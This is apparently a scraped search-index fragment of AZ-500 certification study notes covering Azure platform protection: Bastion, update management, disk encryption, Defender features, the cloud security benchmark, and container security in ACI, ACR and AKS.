                            No hassle of managing NSGs: Azure Bastion is a fully managed platform PaaS service from Azure that is hardened internally to provide you secure RDP/SSH connectivity. You don't need to apply any NSGs on Azure Bastion subnet. Because Azure Bastion connects to your virtual machines over private IP, you can configure your NSGs to allow RDP/SSH from Azure Bastion only.

                            Protection against port scanning: Because you do not need to expose your virtual machines to public Internet, your VMs are protected against port scanning by rogue and malicious users located outside your virtual network.

                            Protect against zero-day exploits. Hardening in one place only: Azure Bastion is a fully platform-managed PaaS service. Because it sits at the perimeter of your virtual network, you don\u2019t need to worry about hardening each of the virtual machines in your virtual network.

                            ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-2-platform-protection/#36-update-management","title":"3.6. Update Management","text":"

                            Azure Update Management is a service included as part of your Azure subscription. With Update Management, you can assess your update status across your environment and manage your Windows Server and Linux server updates from a single location\u2014for both your on-premises and Azure environments.

                            Update Management is available at no additional cost (you pay only for the log data that Azure Log Analytics stores), and you can easily enable it for Azure and on-premises VMs. \u00a0You can also enable Update Management for VMs directly from your Azure Automation account.

                            Configurations on managed computers:

                            • Microsoft Monitoring Agent (MMA) for Windows or Linux.
                            • Desired State Configuration (DSC) in Windows PowerShell for Linux.
                            • Hybrid Runbook Worker in Azure Automation.
                            • Microsoft Update or Windows Server Update Services (WSUS) for Windows computers.

                            Azure Automation uses runbooks to install updates. When an update deployment is created, it creates a schedule that starts a master update runbook at the specified time for the included computers. The master runbook starts a child runbook on each agent to install the required updates.

                            The Log Analytics agent for Windows and Linux needs to be installed on the VMs that are running on your corporate network or other cloud environment in order to enable them with Update Management.

                            From your Azure Automation account, you can:

                            • Onboard virtual machines
                            • Assess the status of available updates
                            • Schedule installation of required updates
                            • Review deployment results to verify that updates were applied successfully to all virtual machines for which Update Management is enabled

                            Azure Update Management provides the ability to deploy patches based on classifications. However, there are scenarios where you may want to explicitly list the exact set of patches. With update inclusion lists you can choose exactly which patches you want to deploy instead of relying on patch classifications.

                            ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-2-platform-protection/#37-disk-encryption","title":"3.7. Disk encryption","text":"","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-2-platform-protection/#windows","title":"WINDOWS","text":"

                            Azure Disk Encryption for Windows VMs\u00a0helps protect and safeguard your data to meet your organizational security and compliance commitments. It uses the BitLocker feature of Windows to provide volume encryption for the OS and data disks of Azure virtual machines (VMs), and is integrated with Azure Key Vault to help you control and manage the disk encryption keys and secrets. Azure Disk Encryption is zone resilient, the same way as Virtual Machines.

                            Supported VMs. - Azure Disk Encryption is supported on Generation 1 and Generation 2 VMs. Azure Disk Encryption is also available for VMs with premium storage. Azure Disk Encryption is not available on Basic, A-series VMs, or on virtual machines with less than 2 GB of memory.

                            Supported operating systems. - - Windows client: Windows 8 and later. - Windows Server: Windows Server 2008 R2 and later. - Windows 10 Enterprise multi-session.

                            To enable Azure Disk Encryption, the VMs must meet the following network endpoint configuration requirements:

                            • To get a token to connect to your key vault, the Windows VM must be able to connect to a Microsoft Entra endpoint, [login.microsoftonline.com].
                            • To write the encryption keys to your key vault, the Windows VM must be able to connect to the key vault endpoint.
                            • The Windows VM must be able to connect to an Azure storage endpoint that hosts the Azure extension repository and an Azure storage account that hosts the VHD files.
                            • If your security policy limits access from Azure VMs to the Internet, you can resolve the preceding URI and configure a specific rule to allow outbound connectivity to the IPs.

                            Group Policy requirements. - Azure Disk Encryption uses the BitLocker external key protector for Windows VMs. For domain joined VMs, don't push any group policies that enforce TPM protectors. BitLocker policy on domain joined virtual machines with custom group policy must include the following setting: Configure user storage of BitLocker recovery information -> Allow 256-bit recovery key. Azure Disk Encryption will fail when custom group policy settings for BitLocker are incompatible. On machines that didn't have the correct policy setting, apply the new policy, force the new policy to update (gpupdate.exe /force), and then restarting may be required. Azure Disk Encryption will fail if domain level group policy blocks the AES-CBC algorithm, which is used by BitLocker.

                            Encryption key storage requirements. - Azure Disk Encryption requires an Azure Key Vault to control and manage disk encryption keys and secrets. Your key vault and VMs must reside in the same Azure region and subscription.

                            ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-2-platform-protection/#linux","title":"LINUX","text":"

                            Supported VMs. - \u00a0Azure Disk Encryption is supported on Generation 1 and Generation 2 VMs. Azure Disk Encryption is also available for VMs with premium storage.

                            Note:\u00a0Azure Disk Encryption is not available on Basic, A-series VMs, or on virtual machines that do not meet these minimum memory requirements:

                            Virtual machine Minimum memory requirement Linux VMs when only encrypting data volumes 2 GB Linux VMs when encrypting both data and OS volumes, and where the root (/) file system usage is 4GB or less 8 GB Linux VMs when encrypting both data and OS volumes, and where the root (/) file system usage is greater than 4GB The root file system usage * 2. For instance, a 16 GB of root file system usage requires at least 32GB of RAM

                            Once the OS disk encryption process is complete on Linux virtual machines, the VM can be configured to run with less memory.

                            Azure Disk Encryption requires the dm-crypt and\u00a0vfat\u00a0modules to be present on the system. Removing or disabling\u00a0vfat\u00a0from the default image will prevent the system from reading the key volume and obtaining the key needed to unlock the disks on subsequent reboots. System hardening steps that remove the vfat module from the system are not compatible with Azure Disk Encryption

                            ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-2-platform-protection/#38-managed-disk-encryption-options","title":"3.8. Managed disk encryption options","text":"

                            There are several types of encryption available for your managed disks, including Azure Disk Encryption (ADE), Server-Side Encryption (SSE), and encryption at the host.

                            Azure Disk Encryption helps protect and safeguard your data to meet organizational security and compliance commitments. ADE encrypts the OS and data disks of Azure virtual machines (VMs) inside your VMs by using the device mapper DM-Crypt feature of Linux or the BitLocker feature of Windows. Azure Disk Encryption (ADE) is integrated with Azure Key Vault to help you control and manage the disk encryption keys and secrets. Azure Disk Storage Server-Side Encryption (also referred to as encryption-at-rest or Azure Storage encryption) automatically encrypts data stored on Azure-managed disks (OS and data disks) when persisting on the Storage Clusters. When configured with a Disk Encryption Set (DES), it supports customer-managed keys as well. Encryption at the host ensures that data stored on the VM host hosting your VM is encrypted at rest and flows encrypted to the Storage clusters. Confidential disk encryption binds disk encryption keys to the virtual machine's TPM (Trusted Platform Module) and makes the protected disk content accessible only to the VM. The TPM and VM guest state is always encrypted in attested code using keys released by a secure protocol that bypasses the hypervisor and host operating system. Currently only available for the OS disk. Encryption at the host may be used for other disks on a Confidential VM in addition to Confidential Disk Encryption.

                            For\u00a0Encryption at the host\u00a0and\u00a0Confidential disk encryption, Microsoft Defender for Cloud does not detect the encryption state. We are in the process of updating Microsoft Defender.

                            ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-2-platform-protection/#39-windows-defender","title":"3.9. Windows Defender","text":"

                            Windows 10, Windows Server 2019, and Windows Server 2016 include key security features. They are Windows Defender Credential Guard, Windows Defender Device Guard, and Windows Defender Application Control.

                            • Windows Defender Credential Guard: Introduced in Windows 10 Enterprise and Windows Server 2016, Windows Defender Credential Guard uses virtualization-based security enhancement to isolate secrets so that only privileged system software can access them. Unauthorized access to these secrets might lead to credential theft attacks, such as Pass-the-Hash or pass-the-ticket attacks. Windows Defender Credential Guard helps prevent these attacks by helping protect Integrated Windows Authentication (NTLM) password hashes, Kerberos authentication ticket-granting tickets, and credentials that applications store as domain credentials.
                            • Windows Defender Application Control: Windows Defender Application Control helps mitigate these types of threats by restricting the applications that users can run and the code that runs in the system core, or kernel. Policies in Windows Defender Application Control also block unsigned scripts and MSIs, and Windows PowerShell runs in Constrained language mode.
                            • Windows Defender Device Guard: Does this mean the Windows Defender Device Guard configuration state is going away? Not at all. The term device guard will continue to describe the fully locked down state achieved using Windows Defender Application Control, HVCI, and hardware and firmware security features. It will also allow Microsoft to work with its original equipment manufacturer (OEM) partners to identify specifications for devices that are device guard capable\u2014so that joint customers can easily purchase devices that meet all the hardware and firmware requirements of the original locked down scenario of Windows Defender Device Guard for Windows 10 devices.

                            Microsoft Defender for Endpoint - Supported Operating Systems

                            ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-2-platform-protection/#310-microsoft-cloud-security-benchmark-in-defender-for-cloud","title":"3.10. Microsoft cloud security benchmark in Defender for Cloud","text":"

                            The\u00a0Microsoft cloud security benchmark (MCSB)\u00a0provides prescriptive best practices and recommendations to help\u00a0improve the security of workloads,\u00a0data, and\u00a0services\u00a0on\u00a0Azure\u00a0and your\u00a0multicloud environment. This benchmark focuses on\u00a0cloud-centric control areas\u00a0with input from a set of\u00a0holistic Microsoft\u00a0and\u00a0industry security guidance\u00a0that includes:

                            • Cloud Adoption Framework: Guidance on\u00a0security, including\u00a0strategy,\u00a0roles\u00a0and\u00a0responsibilities,\u00a0Azure Top 10 Security Best Practices, and\u00a0reference implementation.
                            • Azure Well-Architected Framework: Guidance on securing your workloads on Azure.
                            • The Chief Information Security Officer (CISO) Workshop: Program guidance and reference strategies to accelerate security modernization using Zero Trust principles.
                            • Other industry and cloud service provider's security best practice standards and framework: Examples include the Amazon Web Services (AWS) Well-Architected Framework, Center for Internet Security (CIS) Controls, National Institute of Standards and Technology (NIST), and Payment Card Industry Data Security Standard (PCI-DSS).

                            The\u00a0Azure Security Benchmark (ASB)\u00a0at \u00a0Microsoft cloud security benchmark (MCSB) helps you quickly work with different clouds by:

                            • Providing a single control framework to easily meet the security controls across clouds
                            • Providing consistent user experience for monitoring and enforcing the multicloud security benchmark in Defender for Cloud
                            • Staying aligned with Industry Standards (e.g., Center for Internet Security, National Institute of Standards and Technology, Payment Card Industry)

                            Automated control monitoring for AWS in Microsoft Defender for Cloud:\u00a0You can use\u00a0Microsoft Defender for Cloud Regulatory Compliance Dashboard\u00a0to monitor your AWS environment against\u00a0Microsoft cloud security benchmark (MCSB), just like how you monitor your Azure environment. We developed approximately\u00a0180 AWS checks\u00a0for the new AWS security guidance in MCSB, allowing you to monitor your AWS environment and resources in Microsoft Defender for Cloud.

                            Some controls:

                            Control Domains Description Network security (NS) Network Security\u00a0covers controls to secure and protect networks, including securing virtual networks, establishing private connections, preventing and mitigating external attacks, and securing Domain Name System (DNS). Identity Management (IM) Identity Management\u00a0covers controls to establish a secure identity and access controls using identity and access management systems, including the use of single sign-on, strong authentications, managed identities (and service principals) for applications, conditional access, and account anomalies monitoring. Privileged Access (PA) Privileged Access\u00a0covers controls to protect privileged access to your tenant and resources, including a range of controls to protect your administrative model, administrative accounts, and privileged access workstations against deliberate and inadvertent risk. Data Protection (DP) Data Protection\u00a0covers control of data protection at rest, in transit, and via authorized access mechanisms, including discover, classify, protect, and monitoring sensitive data assets using access control, encryption, key management, and certificate management. Asset Management (AM) Asset Management\u00a0covers controls to ensure security visibility and governance over your resources, including recommendations on permissions for security personnel, security access to asset inventory and managing approvals for services and resources (inventory,\u00a0track, and\u00a0correct). Logging and Threat Detection (LT) Logging and Threat Detection\u00a0covers controls for detecting threats on the cloud and enabling, collecting, and storing audit logs for cloud services, including enabling detection, investigation, and remediation processes with controls to generate high-quality alerts with native threat detection in cloud services; it also includes collecting logs with a cloud monitoring service, centralizing security analysis with a\u00a0security event management (SEM), time synchronization, and log retention. Incident Response (IR) Incident Response\u00a0covers controls in the incident response life cycle - preparation, detection and analysis, containment, and post-incident activities, including using Azure services (such as Microsoft Defender for Cloud and Sentinel) and/or other cloud services to automate the incident response process. Posture and Vulnerability Management (PV) Posture and Vulnerability Management\u00a0focuses on controls for assessing and improving the cloud security posture, including vulnerability scanning, penetration testing, and remediation, as well as security configuration tracking, reporting, and correction in cloud resources. Endpoint Security (ES) Endpoint Security\u00a0covers controls in endpoint detection and response, including the use of endpoint detection and response (EDR) and anti-malware service for endpoints in cloud environments. Backup and Recovery (BR) Backup and Recovery\u00a0covers controls to ensure that data and configuration backups at the different service tiers are performed, validated, and protected. DevOps Security (DS) DevOps Security\u00a0covers the controls related to the security engineering and operations in the DevOps processes, including deployment of critical security checks (such as static application security testing and vulnerability management) prior to the deployment phase to ensure the security throughout the DevOps process; it also includes common topics such as threat modeling and software supply security. Governance and Strategy (GS) Governance and Strategy\u00a0provides guidance for ensuring a coherent security strategy and documented governance approach to guide and sustain security assurance, including establishing roles and responsibilities for the different cloud security functions, unified technical strategy, and supporting policies and standards.","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-2-platform-protection/#311-microsoft-defender-for-cloud-recommendations","title":"3.11. Microsoft Defender for Cloud recommendations","text":"

                            Using the\u00a0policies, Defender for Cloud periodically analyzes the compliance status of your resources to identify potential security misconfigurations and weaknesses. It then provides you with recommendations on how to remediate those issues. Recommendations result from assessing your resources against the relevant policies and identifying resources that aren't meeting your defined requirements.

                            Defender for Cloud\u00a0makes its security recommendations based on your chosen initiatives. When a policy from your initiative is compared against your resources and finds one or more that aren't compliant, it is presented as a recommendation in Defender for Cloud.

                            Recommendations\u00a0are actions for you to take to secure and harden your resources. In practice, it works like this:

                            1. Azure Security Benchmark is an\u00a0initiative\u00a0that contains requirements. For example, Azure Storage accounts must restrict network access to reduce their attack surface.

                            2. The initiative includes multiple\u00a0policies, each requiring a specific resource type. These policies enforce the requirements in the initiative. To continue the example, the storage requirement is enforced with the policy \"Storage accounts should restrict network access using virtual network rules.\"

                            3. Microsoft Defender for Cloud continually assesses your connected subscriptions. If it finds a resource that doesn't satisfy a policy, it displays a\u00a0recommendation\u00a0to fix that situation and harden the security of resources that aren't meeting your security requirements. For example, if an Azure Storage account on your protected subscriptions isn't protected with virtual network rules, you'll see the recommendation to harden those resources.

                            So, (1)\u00a0an initiative includes\u00a0(2)\u00a0policies that generate\u00a0(3)\u00a0environment-specific recommendations.

                            ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-2-platform-protection/#4-containers-security","title":"4. Containers security","text":"","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-2-platform-protection/#41-containers","title":"4.1. Containers","text":"

                            A container is an isolated, lightweight silo for running an application on the host operating system. Containers build on top of the host operating system's kernel (which can be thought of as the buried plumbing of the operating system), and contain only apps and some lightweight operating system APIs and services that run in user mode. While a container shares the host operating system's kernel, the container doesn't get unfettered access to it. Instead, the container gets an isolated\u2013and in some cases virtualized\u2013view of the system. For example, a container can access a virtualized version of the file system and registry, but any changes affect only the container and are discarded when it stops. To save data, the container can mount persistent storage such as an Azure Disk or a file share (including Azure Files).

                            You need\u00a0Docker\u00a0in order to work with Windows Containers. Docker consists of the Docker Engine (dockerd.exe), and the Docker client (docker.exe).

                            How it works.- A container builds on top of the kernel, but the kernel doesn't provide all of the APIs and services an app needs to run\u2013most of these are provided by system files (libraries) that run above the kernel in user mode. Because a container is isolated from the host's user mode environment, the container needs its own copy of these user mode system files, which are packaged into something known as a base image. The base image serves as the foundational layer upon which your container is built, providing it with operating system services not provided by the kernel.

                            Because containers require far fewer resources (for example, they don't need a full OS), they're easy to deploy and they start fast. This allows you to have higher density, meaning that it allows you to run more services on the same hardware unit, thereby reducing costs. As a side effect of running on the same kernel, you get less isolation than VMs.

                            Features

                            Isolation. - Typically provides lightweight isolation from the host and other containers, but doesn't provide as strong a security boundary as a VM. (You can increase the security by using Hyper-V isolation mode to isolate each container in a lightweight VM).

                            Operating System. - Runs the user mode portion of an operating system, and can be tailored to contain just the needed services for your app, using fewer system resources.

                            Deployment. - Deploy individual containers by using Docker via command line; deploy multiple containers by using an orchestrator such as Azure Kubernetes Service.

                            Persistent storage. - Use Azure Disks for local storage for a single node, or Azure Files (SMB shares) for storage shared by multiple nodes or servers.

                            Fault tolerance. - If a cluster node fails, any containers running on it are rapidly recreated by the orchestrator on another cluster node.

                            Networking. - Uses an isolated view of a virtual network adapter, providing a little less virtualization\u2013the host's firewall is shared with containers\u2013while using less resources.

                            In Docker, each layer is the resulting set of changes that happen to the filesystem after executing a command, such as, installing a program. So, when you view the filesystem after the layer has been copied, you can view all the files, including the layer when the program was installed. You can think of an image as an auxiliary read-only hard disk ready to be installed in a \"computer\" where the operating system is already installed. Similarly, you can think of a container as the \"computer\" with the image hard disk installed. The container, just like a computer, can be powered on or off.

                            ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-2-platform-protection/#42-azure-container-instances-aci-security","title":"4.2. Azure Container Instances (ACI) security","text":"

                            There are many security recommendations for Azure Container Instances, use these to optimize your security for containers.

                            Use a private registry: Containers are built from images that are stored in one or more repositories. These repositories can belong to a public registry, like Docker Hub, or to a private registry. An example of a private registry is the Docker Trusted Registry, which can be installed on-premises or in a virtual private cloud. You can also use cloud-based private container registry services, including Azure Container Registry. A publicly available container image does not guarantee security. Container images consist of multiple software layers, and each software layer might have vulnerabilities. To help reduce the threat of attacks, you should store and retrieve images from a private registry, such as Azure Container Registry or Docker Trusted Registry. In addition to providing a managed private registry, Azure Container Registry supports service principal-based authentication through Microsoft Entra ID for basic authentication flows. This authentication includes role-based access for read-only (pull), write (push), and other permissions.

                            Monitor and scan container images continuously: Take advantage of solutions to scan container images in a private registry and identify potential vulnerabilities. It\u2019s important to understand the depth of threat detection that the different solutions provide. For example, Azure Container Registry optionally integrates with Microsoft Defender for Cloud to automatically scan all Linux images pushed to a registry. Microsoft Defender for Cloud integrated Qualys scanner detects image vulnerabilities, classifies them, and provides remediation guidance.

                            Protect credentials: Containers can spread across several clusters and Azure regions. So, you must secure credentials required for logins or API access, such as passwords or tokens. Ensure that only privileged users can access those containers in transit and at rest. Inventory all credential secrets, and then require developers to use emerging secrets-management tools that are designed for container platforms. Make sure that your solution includes encrypted databases, TLS encryption for secrets data in transit, and least-privilege role-based access control. Azure Key Vault is a cloud service that safeguards encryption keys and secrets (such as certificates, connection strings, and passwords) for containerized applications. Because this data is sensitive and business critical, secure access to your key vaults so that only authorized applications and users can access them.

                            Use vulnerability management as part of your container development lifecycle: By using effective vulnerability management throughout the container development lifecycle, you improve the odds that you identify and resolve security concerns before they become a more serious problem.

                            Scan for vulnerabilities: New vulnerabilities are discovered all the time, so scanning for and identifying vulnerabilities is a continuous process. Incorporate vulnerability scanning throughout the container lifecycle:

                            Ensure that only approved images are used in your environment: There\u2019s enough change and volatility in a container ecosystem without allowing unknown containers as well. Allow only approved container images. Have tools and processes in place to monitor for and prevent the use of unapproved container images. An effective way of reducing the attack surface and preventing developers from making critical security mistakes is to control the flow of container images into your development environment. Image signing or fingerprinting can provide a chain of custody that enables you to verify the integrity of the containers. For example, Azure Container Registry supports Docker's content trust model, which allows image publishers to sign images that are pushed to a registry, and image consumers to pull only signed images.

                            Enforce least privileges in runtime: The concept of least privileges is a basic security best practice that also applies to containers. When a vulnerability is exploited, it generally gives the attacker access and privileges equal to those of the compromised application or process. Ensuring that containers operate with the lowest privileges and access required to get the job done reduces your exposure to risk.

                            Reduce the container attack surface by removing unneeded privileges: You can also minimize the potential attack surface by removing any unused or unnecessary processes or privileges from the container runtime. Privileged containers run as root. If a malicious user or workload escapes in a privileged container, the container will then run as root on that system.

                            Log all container administrative user access for auditing: Maintain an accurate audit trail of administrative access to your container ecosystem, including your Kubernetes cluster, container registry, and container images. These logs might be necessary for auditing purposes and will be useful as forensic evidence after any security incident. Azure solutions include:

                            • Integration of Azure Kubernetes Service with Microsoft Defender for Cloud to monitor the security configuration of the cluster environment and generate security recommendations
                            • Azure Container Monitoring solution
                            • Resource logs for Azure Container Instances and Azure Container Registry

                            Container access

                            • Azure Container Instances enables exposing your container groups directly to the internet with an IP address and a fully qualified domain name (FQDN). When you create a container instance, you can specify a custom DNS name label so your application is reachable at customlabel.azureregion.azurecontainer.io.
                            • Azure Container Instances also supports executing a command in a running container by providing an interactive shell to help with application development and troubleshooting. Access takes places over HTTPS, using TLS to secure client connections.

                            Container deployment: Deploy containers from DockerHub or Azure Container Registry.

                            Hypervisor-level security:\u00a0Historically, containers have offered application dependency isolation and resource governance but have not been considered sufficiently hardened for hostile multi-tenant usage. Azure Container Instances guarantees your application is as isolated in a container as it would be in a VM.

                            Custom sizes:\u00a0Containers are typically optimized to run just a single application, but the exact needs of those applications can differ greatly. Azure Container Instances provides optimum utilization by allowing exact specifications of CPU cores and memory. You pay based on what you need and get billed by the second, so you can fine-tune your spending based on actual need.

                            Persistent storage: To retrieve and persist state with Azure Container Instances, we offer direct mounting of Azure Files shares backed by Azure Storage.

                            Flexible billing: Supports per-GB, per-CPU, and per-second billing.

                            Linux and Windows containers: \u00a0Azure Container Instances can schedule both Windows and Linux containers with the same API. Simply specify the OS type when you create your container groups. For Windows container deployments, use images based on common Windows base images. Some features are currently restricted to Linux containers:

                            • Multiple containers per container group
                            • Volume mounting (Azure Files, emptyDir, GitRepo, secret)
                            • Resource usage metrics with Azure Monitor
                            • Virtual network deployment
                            • GPU resources (preview)

                            Co-scheduled groups: Azure Container Instances supports scheduling of multi-container groups that share a host machine, local network, storage, and lifecycle. This enables you to combine your main application container with other supporting role containers, such as logging sidecars.

                            Virtual network deployment: \u00a0Currently available for production workloads in a subset of Azure regions, this feature of Azure Container Instances enables deployment of container instances into an Azure virtual network. By deploying container instances into a subnet within your virtual network, they can communicate securely with other resources in the virtual network, including those that are on premises (through VPN gateway or ExpressRoute).

                            ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-2-platform-protection/#43-azure-container-registry-acr","title":"4.3. Azure Container Registry (ACR)","text":"

                            A container registry is a service that stores and distributes container images. Docker Hub is a public container registry that supports the open source community and serves as a general catalog of images. Azure Container Registry provides users with direct control of their images, with integrated authentication, geo-replication supporting global distribution and reliability for network-close deployments, virtual network and firewall configuration, tag locking, and many other enhanced features.

                            In addition to Docker container images, Azure Container Registry supports related content artifacts including Open Container Initiative (OCI) image formats.

                            You log in to a registry using the Azure CLI or the standard docker login command. Azure Container Registry transfers container images over HTTPS, and supports TLS to secure client connections. Azure Container Registry requires all secure connections from servers and applications to use TLS 1.2. Enable TLS 1.2 by using any recent docker client (version 18.03.0 or later). You control access to a container registry using an Azure identity, a Microsoft Entra ID-backed service principal, or a provided admin account. Use role-based access control (RBAC) to assign users or systems fine-grained permissions to a registry.

                            Container registries manage repositories, collections of container images or other artifacts with the same name, but different tags. For example, the following three images are in the \"acr-helloworld\" repository:

                            • acr-helloworld:latest
                            • acr-helloworld:v1
                            • acr-helloworld:v2

                            A container image or other artifact within a registry is associated with one or more tags, has one or more layers, and is identified by a manifest. Understanding how these components relate to each other can help you manage your registry effectively.

                            As with any IT environment, you should consistently monitor activity and user access to your container ecosystem to quickly identify any suspicious or malicious activity. The container monitoring solution in Log Analytics can help you view and manage your Docker and Windows container hosts in a single location.

                            By using Log Analytics, you can:

                            • View detailed audit information that shows commands used with containers.
                            • Troubleshoot containers by viewing and searching centralized logs without having to remotely view Docker or Windows hosts.
                            • Find containers that may be noisy and consuming excess resources on a host.
                            • View centralized CPU, memory, storage, and network usage and performance information for containers.
                            ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-2-platform-protection/#44-azure-container-registry-authentication","title":"4.4. Azure Container Registry authentication","text":"

                            Individual login with Microsoft Entra ID.- When working with your registry directly, such as pulling images to and pushing images from a development workstation, authenticate by using the az acr login command in the Azure CLI. When you log in with az acr login, the CLI uses the token created when you executed az login to seamlessly authenticate your session with your registry. To complete the authentication flow, Docker must be installed and running in your environment. az acr login uses the Docker client to set a Microsoft Entra token in the docker.config file. Once you've logged in this way, your credentials are cached, and subsequent docker commands in your session do not require a username or password.

                            Service Principal.- If you assign a service principal to your registry, your application or service can use it for headless authentication. Service principals allow role-based access to a registry, and you can assign multiple service principals to a registry. Multiple service principals allow you to define different access for different applications. The available roles for a container registry include:

                            • AcrPull: pull
                            • AcrPush: pull and push
                            • Owner: pull, push, and assign roles to other users

                            Admin account.- Each container registry includes an admin user account, which is disabled by default. You can enable the admin user and manage its credentials in the Azure portal, or by using the Azure CLI or other Azure tools. The admin account is provided with two passwords, both of which can be regenerated. Two passwords allow you to maintain connection to the registry by using one password while you regenerate the other. If the admin account is enabled, you can pass the username and either password to the docker login command when prompted for basic authentication to the registry.

                            ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-2-platform-protection/#45-azure-kubernetes-service-aks","title":"4.5. Azure Kubernetes Service (AKS)","text":"

                            As application development moves towards a container-based approach, the need to orchestrate and manage resources is important. Kubernetes is the leading platform that provides the ability to provide reliable scheduling of fault-tolerant application workloads. Azure Kubernetes Service (AKS) is a managed Kubernetes offering that further simplifies container-based application deployment and management.

                            Azure Kubernetes Service (AKS) provides a managed Kubernetes service that reduces the complexity for deployment and core management tasks, including coordinating upgrades. The AKS control plane is managed by the Azure platform, and you only pay for the AKS nodes that run your applications. AKS is built on top of the open-source Azure Kubernetes Service Engine (aks-engine).

                            Kubernetes cluster architecture: A Kubernetes cluster is divided into two components:

                            • Control plane\u00a0nodes provide the core Kubernetes services and orchestration of application workloads.
                            • Nodes\u00a0run your application workloads.

                            Features of Azure Kubernetes Service:

                            • Fully managed
                            • Public IP and FQDN (Private IP option)
                            • Accessed with RBAC or Microsoft Entra ID
                            • Deployment of containers
                            • Dynamic scale containers
                            • Automation of rolling updates and rollbacks of containers
                            • Management of storage, network traffic, and sensitive information

                            Kubernetes cluster architecture is a set of design recommendations for deploying your containers in a secure and managed configuration. When you create an AKS cluster, a cluster master is automatically created and configured. This cluster master is provided as a managed Azure resource abstracted from the user. There is no cost for the cluster master, only the nodes that are part of the AKS cluster. The cluster master includes the following core Kubernetes components:

                            • kube-apiserver\u00a0- The API server is how the underlying Kubernetes APIs are exposed. This component provides the interaction for management tools, such as\u00a0kubectl\u00a0or the Kubernetes dashboard. By default, the Kubernetes API server uses a public IP address and a fully qualified domain name (FQDN). You can control access to the API server using Kubernetes role-based access controls and Microsoft Entra ID.
                            • etcd\u00a0- To maintain the state of your Kubernetes cluster and configuration, the highly available\u00a0etcd\u00a0is a key value store within Kubernetes.
                            • kube-scheduler\u00a0- When you create or scale applications, the Scheduler determines what nodes can run the workload and starts them.
                            • kube-controller-manager\u00a0- The Controller Manager oversees a number of smaller Controllers that perform actions such as replicating pods and handling node operations.

                            AKS provides a single-tenant cluster master, with a dedicated API server, Scheduler, etc. You define the number and size of the nodes, and the Azure platform configures the secure communication between the cluster master and nodes. Interaction with the cluster master occurs through Kubernetes APIs, such as\u00a0kubectl\u00a0or the Kubernetes dashboard.

                            This managed cluster master means that you do not need to configure components like a highly available store, but it also means that you cannot access the cluster master directly. Upgrades to Kubernetes are orchestrated through the Azure CLI or Azure portal, which upgrades the cluster master and then the nodes. To troubleshoot possible issues, you can review the cluster master logs through Azure Log Analytics.

                            If you need to configure the cluster master in a particular way or need direct access to them, you can deploy your own Kubernetes cluster using\u00a0aks-engine.

                            Nodes and node pools: To run your applications and supporting services, you need a Kubernetes node. An AKS cluster has one or more nodes, which is an Azure virtual machine (VM) that runs the Kubernetes node components and container runtime:

                            • The kubelet is the Kubernetes agent that processes the orchestration requests from the control plane and scheduling of running the requested containers.
                            • Virtual networking is handled by the kube-proxy on each node. The proxy routes network traffic and manages IP addressing for services and pods.
                            • The\u00a0container runtime\u00a0is the component that allows containerized applications to run and interact with additional resources such as the virtual network and storage. In AKS, Moby is used as the container runtime.

                            The Azure VM size for your nodes defines how many CPUs, how much memory, and the size and type of storage available (such as high-performance SSD or regular HDD). If you anticipate a need for applications that require large amounts of CPU and memory or high-performance storage, plan the node size accordingly. You can also scale out the number of nodes in your AKS cluster to meet demand.

                            In AKS, the VM image for the nodes in your cluster is currently based on Ubuntu Linux or Windows Server 2019. When you create an AKS cluster or scale out the number of nodes, the Azure platform creates the requested number of VMs and configures them. There's no manual configuration for you to perform. Agent nodes are billed as standard virtual machines, so any discounts you have on the VM size you're using (including Azure reservations) are automatically applied. If you need to use a different host OS, container runtime, or include custom packages, you can deploy your own Kubernetes cluster using aks-engine. The upstream aks-engine releases features and provides configuration options before they are officially supported in AKS clusters. For example, if you wish to use a container runtime other than Moby, you can use aks-engine to configure and deploy a Kubernetes cluster that meets your current needs.

                            Some basic concepts

                            • Pools: Group of nodes with identical configuration.
                            • Node: Individual VM running containerized applications.
                            • Pods: Single instance of an application. A pod can contain multiple containers.
                            • Deployment: One or more identical pods managed by Kubernetes.
                            • Manifest: YAML file describing a deployment.

                            AKS nodes are Azure virtual machines that you manage and maintain. Linux nodes run an optimized Ubuntu distribution using the Moby container runtime. Windows Server nodes run an optimized Windows Server 2019 release and also use the Moby container runtime. When an AKS cluster is created or scaled up, the nodes are automatically deployed with the latest OS security updates and configurations.

                            • Linux: The Azure platform automatically applies OS security patches to Linux nodes on a nightly basis. If a Linux OS security update requires a host reboot, that reboot is not automatically performed. You can manually reboot the Linux nodes, or a common approach is to use Kured, an open-source reboot daemon for Kubernetes. Kured runs as a DaemonSet and monitors each node for the presence of a file indicating that a reboot is required. Reboots are managed across the cluster using the same cordon and drain process as a cluster upgrade.
                            • Windows: Windows Update does not automatically run and apply the latest updates. On a regular schedule around the Windows Update release cycle and your own validation process, you should perform an upgrade on the Windows Server node pool(s) in your AKS cluster. This upgrade process creates nodes that run the latest Windows Server image and patches, then removes the older nodes. Nodes are deployed into a private virtual network subnet, with no public IP addresses assigned. For troubleshooting and management purposes, SSH is enabled by default. This SSH access is only available using the internal IP address.

                            To provide storage, the nodes use Azure Managed Disks. For most VM node sizes, these are Premium disks backed by high-performance SSDs. The data stored on managed disks is automatically encrypted at rest within the Azure platform. To improve redundancy, these disks are also securely replicated within the Azure datacenter.

